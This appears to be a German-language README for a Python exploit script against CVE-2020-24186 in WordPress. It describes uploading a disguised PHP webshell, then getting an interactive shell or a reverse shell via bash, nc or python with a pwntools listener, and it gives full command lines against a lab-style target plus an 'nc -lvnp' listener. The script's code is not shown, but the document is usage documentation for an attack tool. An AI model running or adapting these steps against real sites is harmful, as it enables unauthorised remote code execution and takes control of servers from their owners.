
Dieses Skript nutzt die Schwachstelle CVE-2020-24186 in WordPress aus, um eine getarnte PHP-Nutzlast hochzuladen und eine Shell auf dem Zielsystem zu erhalten. Es gibt drei Betriebsmodi:
Interaktive Shell:
Lädt die Basis-Webshell hoch und wechselt in einen interaktiven Modus, in dem Sie Befehle über den Parameter cmd senden können.
Manuelle Reverse Shell:
Lädt die Webshell hoch und sendet die Reverse-Shell-Nutzlast, startet aber keinen automatischen Listener. Sie müssen Ihren eigenen Listener manuell auf der angegebenen IP und dem Port starten.
Reverse Shell mit pwntools:
Lädt die Webshell hoch, sendet die Reverse-Shell-Nutzlast, und das Skript startet automatisch einen Listener mit pwntools, um die Reverse-Verbindung zu empfangen.
requestspwn (pwntools)--url: Basis-URL der Zielwebsite (z. B. http://10.10.110.119).--blogpath: Pfad zum Beitrag (Standard: /?page=1).--mode: Betriebsmodus, entweder interactive oder reverse.--lhost: Lokale IP für die Reverse Shell (im Reverse-Modus erforderlich).--lport: Lokaler Port für die Reverse Shell (im Reverse-Modus erforderlich).--reverse_method: Reverse-Shell-Methode: bash, nc oder python (Standard ist bash).--manual: Wenn im Reverse-Modus verwendet, startet das Skript keinen Listener; Sie müssen Ihren eigenen Listener manuell starten.--use-proxy: Wenn gesetzt, werden Anfragen über den konfigurierten Proxy gesendet.Laden Sie eine Webshell hoch und starten Sie eine interaktive Sitzung, um Befehle zu senden:
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode interactive --use-proxy
Laden Sie die Webshell hoch, senden Sie die Reverse-Shell-Nutzlast, aber starten Sie keinen automatischen Listener. Starten Sie Ihren eigenen Listener manuell (z. B. mit netcat):
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --manual --use-proxy
Starten Sie dann in einem anderen Terminal Ihren Listener manuell:
nc -lvnp 9002
Laden Sie die Webshell hoch, senden Sie die Reverse-Shell-Nutzlast, und lassen Sie das Skript automatisch einen Listener mit pwntools starten, um die Verbindung zu empfangen:
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --use-proxy
Das Skript wartet auf eine Verbindung unter 10.10.1.1:9002 und stellt nach erfolgreicher Verbindung eine interaktive Shell bereit.
Hinweise
--php_payload ändern, falls Anpassungen erforderlich sind.--use-proxy verwenden.